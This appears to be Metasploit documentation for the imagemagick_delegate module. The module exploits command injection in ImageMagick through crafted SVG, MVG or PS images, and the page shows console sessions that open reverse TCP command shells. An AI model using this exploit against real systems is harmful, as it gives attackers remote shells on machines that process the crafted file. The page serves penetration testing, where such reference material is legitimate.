## Vulnerable Application

  ImageMagick

## Verification Steps

  Example steps in this format:

  1. Install the ImageMagick
  2. Start msfconsole
  3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
  4. Do: ```run```
  5. convert msf.png msf.jpg

## Options

  **USE_POPEN**

  When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
  When the option is set to `false`, target 2 (PS file) is valid

## Scenarios

## popen=true
  ```
  msf exploit(imagemagick_delegate) > set target 0
  msf exploit(imagemagick_delegate) > run

  [*] Started reverse TCP handler on 1.1.1.1:4444
  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
  [*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
  ```

  ```
  msf exploit(imagemagick_delegate) > set target 1
  msf exploit(imagemagick_delegate) > run

  [*] Started reverse TCP handler on 10.6.0.186:4444
  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
  [*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
  ```

## popen=false
  ```
  msf exploit(imagemagick_delegate) > set target 2
  target => 2
  msf exploit(imagemagick_delegate) > set USE_POPEN false
  USE_POPEN => false
  msf exploit(imagemagick_delegate) > run

  [*] Started reverse TCP handler on 1.1.1.1:4444
  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
  [*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500
  ```